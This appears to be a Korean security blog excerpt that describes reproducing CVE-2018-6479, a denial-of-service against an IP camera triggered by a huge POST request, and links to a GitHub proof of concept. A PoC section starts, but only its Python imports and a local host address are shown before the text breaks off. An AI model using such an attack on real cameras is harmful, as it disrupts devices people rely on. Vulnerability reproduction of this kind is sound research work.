IoT/IP Camera
-
[ IP Camera Dos Attack (CVE-2018-6479) ]IoT/IP Camera 2018. 9. 30. 04:00
한 동안 IP Camera분석을 못하고 있다가, 예전에 봐두었던 CVE를 재현해봤다.뭐 재현이랄것도 없지만. CVE Number는 2018-6479이며 올해 초에 등록된 CVE이다. github : https://github.com/dreadlocked/netwave-dosvulnerability Attack Vector는 네크워크이며방대한 양의 POST 데이터를 요청할 때 서비스가 중단되는 공격(Denial of Service)이다. ※ 해당 글에는 CVE 재현에 사용되는 IP Camera 제품에 대해서 어떠한 정보도 제공하지 않았습니다. [ PoC ]1234567891011121314151617import stringimport httplibimport urllib2 host = "192.168.1...